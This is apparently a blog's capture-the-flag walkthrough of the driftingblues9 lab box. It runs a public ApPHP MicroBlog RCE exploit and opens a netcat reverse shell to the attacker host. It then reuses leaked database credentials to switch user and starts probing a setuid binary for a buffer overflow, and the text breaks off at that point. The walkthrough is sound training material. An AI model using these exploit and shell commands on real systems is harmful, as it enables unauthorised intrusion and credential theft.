{"id":548,"date":"2024-04-13T21:59:22","date_gmt":"2024-04-13T13:59:22","guid":{"rendered":"http:\/\/162.14.82.114\/?p=548"},"modified":"2024-04-13T21:59:22","modified_gmt":"2024-04-13T13:59:22","slug":"hmv-_-driftingblues9","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/548\/04\/13\/2024\/","title":{"rendered":"hmv[-_-] driftingblues9"},"content":{"rendered":"<h1>driftingblues9<\/h1>\n<p>The last box in this series, gogogo!!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156941.png\" alt=\"image-20240413182659546\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156942.png\" alt=\"image-20240413183029623\" \/><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.6 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">Open 172.20.10.6:80\nOpen 172.20.10.6:111\nOpen 172.20.10.6:36168\n\nPORT      STATE SERVICE REASON  VERSION\n80\/tcp    open  http    syn-ack Apache httpd 2.4.10 ((Debian))\n|_http-title: ApPHP MicroBlog\n|_http-generator: ApPHP MicroBlog vCURRENT_VERSION\n|_http-favicon: Unknown favicon MD5: 9252836E46BB0304BED26A5B96DF4DD4\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.10 (Debian)\n| http-cookie-flags: \n|   \/: \n|     PHPSESSID: \n|_      httponly flag not set\n111\/tcp   open  rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n|   program version    port\/proto  service\n|   100000  2,3,4        111\/tcp   rpcbind\n|   100000  2,3,4        111\/udp   rpcbind\n|   100000  3,4          111\/tcp6  rpcbind\n|   100000  3,4          111\/udp6  rpcbind\n|   100024  1          36168\/tcp   status\n|   100024  1          38464\/tcp6  status\n|   100024  1          46499\/udp6  status\n|_  100024  1          49425\/udp   status\n36168\/tcp open  status  syn-ack 1 (RPC #100024)<\/code><\/pre>\n<p>Only HTTP (Apache 2.4.10 on Debian, serving ApPHP MicroBlog) plus rpcbind and its status service are exposed, so the web application is the attack surface.<\/p>\n<h3>Directory scan<\/h3>\n<pre><code class=\"language-bash\">gobuster dir -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n<pre><code class=\"language-text\">===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     
http:\/\/172.20.10.6\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,git,jpg,txt,png\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.php                 (Status: 403) [Size: 276]\n\/images               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.6\/images\/]\n\/index.php            (Status: 200) [Size: 5650]\n\/docs                 (Status: 301) [Size: 309] [--&gt; http:\/\/172.20.10.6\/docs\/]\n\/page                 (Status: 301) [Size: 309] [--&gt; http:\/\/172.20.10.6\/page\/]\n\/header.php           (Status: 200) [Size: 13]\n\/admin                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.6\/admin\/]\n\/footer.php           (Status: 500) [Size: 614]\n\/license              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.6\/license\/]\n\/README.txt           (Status: 200) [Size: 975]\n\/js                   (Status: 301) [Size: 307] [--&gt; http:\/\/172.20.10.6\/js\/]\n\/include              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.6\/include\/]\n\/backup               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.6\/backup\/]\n\/styles               (Status: 301) [Size: 311] [--&gt; http:\/\/172.20.10.6\/styles\/]\n\/INSTALL.txt          (Status: 200) [Size: 1201]\n\/.php                 (Status: 403) [Size: 276]\n\/wysiwyg              (Status: 301) [Size: 312] [--&gt; http:\/\/172.20.10.6\/wysiwyg\/]\n\/server-status        (Status: 403) [Size: 276]\n\/mails                (Status: 301) [Size: 310] [--&gt; http:\/\/172.20.10.6\/mails\/]\nProgress: 1543920 \/ 1543927 
(100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h3>Vulnerability scan<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/172.20.10.6<\/code><\/pre>\n<pre><code class=\"language-text\">- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          172.20.10.6\n+ Target Hostname:    172.20.10.6\n+ Target Port:        80\n+ Start Time:         2024-04-13 06:33:24 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.10 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ \/: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/images: IP address found in the &#039;location&#039; header. The IP is &quot;127.0.1.1&quot;. See: https:\/\/portswigger.net\/kb\/issues\/00600300_private-ip-addresses-disclosed\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is &quot;127.0.1.1&quot;. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.10 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/: DEBUG HTTP verb may show server debugging information. 
See: https:\/\/docs.microsoft.com\/en-us\/visualstudio\/debugger\/how-to-enable-debugging-for-aspnet-applications?view=vs-2017\n+ \/backup\/: Directory indexing found.\n+ \/backup\/: This might be interesting.\n+ \/images\/: Directory indexing found.\n+ \/docs\/: Directory indexing found.\n+ \/styles\/: Directory indexing found.\n+ \/INSTALL.txt: Default file found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/admin\/home.php: Admin login page\/section found.\n+ 8103 requests: 0 error(s) and 16 item(s) reported on remote host\n+ End Time:           2024-04-13 06:33:39 (GMT-4) (15 seconds)\n---------------------------------------------------------------------------<\/code><\/pre>\n<h2>Vulnerability discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156943.png\" alt=\"image-20240413183101074\" \/><\/p>\n<h3>Visiting the sensitive directories<\/h3>\n<pre><code class=\"language-text\">http:\/\/172.20.10.6\/README.txt<\/code><\/pre>\n<pre><code class=\"language-text\">\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\/\/ \n\/\/ Advanced Power of PHP\n\/\/ ---------------------\n\/\/ http:\/\/www.apphp.com\n\/\/ \n\/\/ ApPHP MicroBlog Free\n\/\/\n\/\/ Version: 1.0.1\n\/\/\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\nThank you for using ApPHP.com software!\n-----------------------------------------------------------------------------------\nIt&#039;s very easy to get started with ApPHP MicroBlog!!!\n1. Installation:\n   http:\/\/apphp.com\/php-microblog\/index.php?page=installation\n2. Getting started:\n   http:\/\/apphp.com\/php-microblog\/index.php?page=getting_started\nIf you have any troubles, find an example of code in the folder, named &quot;examples&quot; \n-----------------------------------------------------------------------------------\nFor more information visit: \n    site    http:\/\/apphp.com\/php-microblog\/index.php?page=examples\n    forum   http:\/\/www.apphp.com\/forum\/<\/code><\/pre>\n<p>README.txt pins the product and version exactly: ApPHP MicroBlog Free 1.0.1. That is the string to search for.<\/p>\n<pre><code class=\"language-text\">http:\/\/172.20.10.6\/backup\/<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156944.png\" alt=\"image-20240413183613778\" \/><\/p>\n<pre><code class=\"language-text\">http:\/\/172.20.10.6\/wysiwyg\/<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156945.png\" alt=\"image-20240413183808228\" \/><\/p>\n<pre><code class=\"language-text\">http:\/\/172.20.10.6\/mails\/<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156947.png\" alt=\"image-20240413183839346\" \/><\/p>\n<p>The password-reminder template below emails the password itself, so the application keeps user passwords in recoverable form.<\/p>\n<pre><code class=\"language-text\"># http:\/\/172.20.10.6\/mails\/password_forgotten.txt\nHello _USER_NAME_!&lt;br&gt; &lt;br&gt;\nYou or someone else asked for your login info on our site, _WEB_SITE_\nYour Login Info:\n------------------------&lt;br\/&gt;\nUsername: _USER_NAME_\nPassword: _USER_PASSWORD_\n------------------&lt;br\/&gt;\nBest 
regards,\n_WEB_SITE_<\/code><\/pre>\n<h3>Searching for known vulnerabilities<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156948.png\" alt=\"image-20240413184026723\" \/><\/p>\n<p>searchsploit has a remote command execution exploit for exactly this version, ApPHP MicroBlog 1.0.1 (EDB-ID 33070). Let's try it. The script is Python 2, so it fails under python3 with a print syntax error and has to be run with python2:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ searchsploit -m php\/webapps\/33070.py\n  Exploit: ApPHP MicroBlog 1.0.1 - Remote Command Execution\n      URL: https:\/\/www.exploit-db.com\/exploits\/33070\n     Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/33070.py\n    Codes: OSVDB-106352, OSVDB-106351\n Verified: True\nFile Type: Python script, ASCII text executable\nCopied to: \/home\/kali\/temp\/driftingblues9\/33070.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python3 33070.py -h\n  File &quot;\/home\/kali\/temp\/driftingblues9\/33070.py&quot;, line 14\n    print &quot;  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-&quot;\n    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\nSyntaxError: Missing parentheses in call to &#039;print&#039;. 
Did you mean print(...)?\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py -h\n  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\n[*] Testing for vulnerability...\nTraceback (most recent call last):\n  File &quot;33070.py&quot;, line 38, in &lt;module&gt;\n    r = urllib.urlopen(url)\n  File &quot;\/usr\/lib\/python2.7\/urllib.py&quot;, line 87, in urlopen\n    return opener.open(url)\n  File &quot;\/usr\/lib\/python2.7\/urllib.py&quot;, line 215, in open\n    return getattr(self, name)(url)\n  File &quot;\/usr\/lib\/python2.7\/urllib.py&quot;, line 471, in open_file\n    return self.open_local_file(url)\n  File &quot;\/usr\/lib\/python2.7\/urllib.py&quot;, line 485, in open_local_file\n    raise IOError(e.errno, e.strerror, e.filename)\nIOError: [Errno 2] No such file or directory: &quot;-h?j);echo(base64_decode(&#039;MTQyMGM2YWZhNjVjMTY5&#039;)=\/&quot;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py   \n  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\nUsage: python 33070.py http:\/\/target\/blog\/index.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ python2 33070.py http:\/\/172.20.10.6 \n  -= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-\noriginal exploit by Jiko : http:\/\/www.exploit-db.com\/exploits\/33030\/\n[*] Testing for vulnerability...\n[+] Website is vulnerable\n\n[*] Fecthing phpinfo\n        PHP Version 5.6.40-0+deb8u12\n        System   Linux debian 3.16.0-4-586 #1 Debian 3.16.51-2 (2017-12-03) i686\n        Loaded Configuration File   \/etc\/php5\/apache2\/php.ini\n        Apache Version   Apache\/2.4.10 (Debian)\n        User\/Group   www-data(33)\/33\n        Server Root   \/etc\/apache2\n        
DOCUMENT_ROOT   \/var\/www\/html\n        PHP Version   5.6.40-0+deb8u12\n        allow_url_fopen  On  On\n        allow_url_include  Off  Off\n        disable_functions  pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,  pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,\n        open_basedir   no value    no value\n        System V Message based IPC   Wez Furlong\n        System V Semaphores   Tom May\n        System V Shared Memory   Christian Cartus\n\n[*] Fetching include\/base.inc.php\n&lt;?php\n                        \/\/ DATABASE CONNECTION INFORMATION\n                        define(&#039;DATABASE_HOST&#039;, &#039;localhost&#039;);           \/\/ Database host\n                        define(&#039;DATABASE_NAME&#039;, &#039;microblog&#039;);           \/\/ Name of the database to be used\n                        define(&#039;DATABASE_USERNAME&#039;, &#039;clapton&#039;); \/\/ User name for access to database\n                        define(&#039;DATABASE_PASSWORD&#039;, &#039;yaraklitepe&#039;);     \/\/ Password for access to database\n                        define(&#039;DB_ENCRYPT_KEY&#039;, &#039;p52plaiqb8&#039;);         \/\/ Database encryption key\n                        define(&#039;DB_PREFIX&#039;, &#039;mb101_&#039;);              \/\/ Unique prefix of all table names in the database\n                        ?&gt;\n\n[*] Testing remote execution\n[+] Remote exec is working with system() :)\nSubmit your commands, 
type exit to quit\n> whoami\nwww-data\n\n> nc -e \/bin\/bash 172.20.10.8 1234<\/code><\/pre>\n<p>It worked: the reverse shell connected back to the listener on 172.20.10.8:1234 as www-data.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156949.png\" alt=\"image-20240413184330274\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@debian:\/var\/www\/html$ ls -la\ntotal 84\ndrwxr-xr-x 13 root root 4096 May  9  2021 .\ndrwxr-xr-x  3 root root 4096 May  9  2021 ..\n-rw-r--r--  1 root root 1039 May 20  2009 .htaccess\n-rw-r--r--  1 root root 1201 Jan 29  2014 INSTALL.txt\n-rw-r--r--  1 root root  975 Jan 29  2014 README.txt\ndrwxr-xr-x  3 root root 4096 May  9  2021 admin\ndrwxr-xr-x  2 root root 4096 May  9  2021 backup\ndrwxr-xr-x  2 root root 4096 May  9  2021 docs\n-rw-r--r--  1 root root 1191 Jan 29  2014 footer.php\n-rw-r--r--  1 root root 1653 Nov 15  2009 header.php\ndrwxr-xr-x  4 root root 4096 May  9  2021 images\ndrwxrwxrwx  3 root root 4096 May  9  2021 include\n-rw-r--r--  1 root root 6409 Mar 10  2014 index.php\ndrwxr-xr-x  2 root root 4096 May  9  2021 js\ndrwxr-xr-x  2 root root 4096 May  9  2021 license\ndrwxr-xr-x  2 root root 4096 May  9  2021 mails\ndrwxr-xr-x  2 root root 4096 May  9  2021 page\n-rw-r--r--  1 root root 1728 Feb  3  2014 rss.xml\ndrwxr-xr-x  4 root root 
4096 May  9  2021 styles\ndrwxr-xr-x  8 root root 4096 May  9  2021 wysiwyg\n(remote) www-data@debian:\/var\/www\/html$ sudo -l\nbash: sudo: command not found\n(remote) www-data@debian:\/var\/www\/html$ cd \/home\n(remote) www-data@debian:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root    root    4096 May  9  2021 .\ndrwxr-xr-x 21 root    root    4096 May  9  2021 ..\ndr-x------  2 clapton clapton 4096 May  9  2021 clapton\n(remote) www-data@debian:\/home$ cd clapton\/\nbash: cd: clapton\/: Permission denied\n(remote) www-data@debian:\/home$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:100:103:systemd Time Synchronization,,,:\/run\/systemd:\/bin\/false\nsystemd-network:x:101:104:systemd Network Management,,,:\/run\/systemd\/netif:\/bin\/false\nsystemd-resolve:x:102:105:systemd Resolver,,,:\/run\/systemd\/resolve:\/bin\/false\nsystemd-bus-proxy:x:103:106:systemd Bus 
Proxy,,,:\/run\/systemd:\/bin\/false\nDebian-exim:x:104:109::\/var\/spool\/exim4:\/bin\/false\nstatd:x:105:65534::\/var\/lib\/nfs:\/bin\/false\nmessagebus:x:106:112::\/var\/run\/dbus:\/bin\/false\nmysql:x:107:114:MySQL Server,,,:\/var\/lib\/mysql:\/bin\/false\nclapton:x:1000:1000:,,,:\/home\/clapton:\/bin\/bash\n(remote) www-data@debian:\/home$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\ncat: \/etc\/cron.weekly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# m h dom mon dow user  command\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\n(remote) www-data@debian:\/home$ su clapton       \nPassword: \nsu: Authentication failure\n(remote) www-data@debian:\/home$ su root\nPassword: \nsu: Authentication failure\n(remote) www-data@debian:\/home$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/bin\/su\n\/bin\/mount\n\/bin\/umount\n\/sbin\/mount.nfs\n\/usr\/bin\/procmail\n\/usr\/bin\/at\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/sbin\/exim4\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n........\n(remote) www-data@debian:\/var\/www\/html\/include$ cat base.inc.php \n&lt;?php\n                        \/\/ DATABASE CONNECTION INFORMATION\n                        define(&#039;DATABASE_HOST&#039;, &#039;localhost&#039;);           \/\/ Database host\n                        define(&#039;DATABASE_NAME&#039;, &#039;microblog&#039;);           \/\/ Name of the database to be used\n                        define(&#039;DATABASE_USERNAME&#039;, &#039;clapton&#039;); \/\/ User name for access to database\n                        define(&#039;DATABASE_PASSWORD&#039;, &#039;yaraklitepe&#039;);     \/\/ Password for access to database\n                        define(&#039;DB_ENCRYPT_KEY&#039;, &#039;p52plaiqb8&#039;);         \/\/ Database encryption key\n                        define(&#039;DB_PREFIX&#039;, &#039;mb101_&#039;);              \/\/ Unique prefix of all table names in the database\n                        ?&gt;<\/code><\/pre>\n<p>base.inc.php gives the database credentials, and the database user name matches the only interactive account in \/etc\/passwd, clapton. Try the same password on the system account:<\/p>\n<pre><code class=\"language-text\">clapton\nyaraklitepe<\/code><\/pre>\n<h3>Switching user<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@debian:\/var\/www\/html\/include$ su clapton\nPassword: \nclapton@debian:\/var\/www\/html\/include$ cd \/home clapton\nclapton@debian:\/home$ \n(local) pwncat$\n(remote) clapton@debian:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root    root    4096 May  9  2021 .\ndrwxr-xr-x 21 root    root    4096 May  
9  2021 ..\ndr-x------  2 clapton clapton 4096 May  9  2021 clapton\n(remote) clapton@debian:\/home$ cd clapton\/\n(remote) clapton@debian:\/home\/clapton$ ls -la\ntotal 24\ndr-x------ 2 clapton clapton 4096 May  9  2021 .\ndrwxr-xr-x 3 root    root    4096 May  9  2021 ..\n-rwsr-xr-x 1 root    root    5150 Sep 22  2015 input\n-rwxr-xr-x 1 root    root     201 May  9  2021 note.txt\n-rw-r--r-- 1 clapton clapton   32 May  9  2021 user.txt\n(remote) clapton@debian:\/home\/clapton$ cat note.txt\nbuffer overflow is the way. ( \u0361\u00b0 \u035c\u0296 \u0361\u00b0)\n\nif you&#039;re new on 32bit bof then check these:\n\nhttps:\/\/www.tenouk.com\/Bufferoverflowc\/Bufferoverflow6.html\nhttps:\/\/samsclass.info\/127\/proj\/lbuf1.htm\n\n(remote) clapton@debian:\/home\/clapton$ cat user.txt \nF569AA95FAFF65E7A290AB9ED031E04F(remote) clapton@debian:\/home\/clapton$ sudo -l\nbash: sudo: command not found\n(remote) clapton@debian:\/home\/clapton$ cd input \nbash: cd: input: Not a directory\n(remote) clapton@debian:\/home\/clapton$ file input \ninput: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped\n(remote) clapton@debian:\/home\/clapton$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/driftingblues9\n(local) pwncat$ download input\ninput 
\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 5.2\/5.2 KB \u2022 ? \u2022 0:00:00[06:56:26] downloaded 5.15KiB in 0.11 seconds<\/code><\/pre>\n<h3>Analysing the binary<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ file input \ninput: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter \/lib\/ld-linux.so.2, for GNU\/Linux 2.6.24, BuildID[sha1]=9e50c7cacaf5cc2c78214c81f110c88e61ad0c10, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ checksec input \nError: No option selected. Please select an option.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues9]\n\u2514\u2500$ checksec --file=input\nRELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      Symbols         FORTIFY Fortified       Fortifiable     FILE\nNo RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   69 Symbols        No    0               2               input<\/code><\/pre>\n<p>No stack canary, NX disabled (the stack is executable) and no PIE: a textbook 32-bit stack overflow target. The only mitigation left to check is ASLR, and that has to be checked on the victim, not on the analysis box.<\/p>\n<p>Open it in IDA:<\/p>\n<pre><code class=\"language-c\">\/\/ main.c (IDA decompiler output)\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char dest; \/\/ [esp+11h] [ebp-9Fh]\n\n  if ( argc &lt;= 1 )\n  {\n    printf(&quot;Syntax: %s &lt;input string&gt;\\n&quot;, *argv);\n    exit(0);\n  }\n  strcpy(&amp;dest, argv[1]);\n  return 0;\n}<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404132156950.png\" alt=\"image-20240413204108420\" \/><\/p>\n<p><code>strcpy<\/code> copies <code>argv[1]<\/code> into the fixed-size stack buffer <code>dest<\/code> (at ebp-0x9f) with no length check, so this is where the overflow happens: anything longer than the buffer runs over the saved frame pointer and the return address. Run it first:<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@debian:\/home\/clapton$ .\/input flag\n(remote) clapton@debian:\/home\/clapton$ .\/input 1234\n(remote) clapton@debian:\/home\/clapton$ .\/input admin<\/code><\/pre>\n<p>No output at all. Test with an oversized argument:<\/p>\n<pre><code class=\"language-bash\">(remote) clapton@debian:\/home\/clapton$ .\/input aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa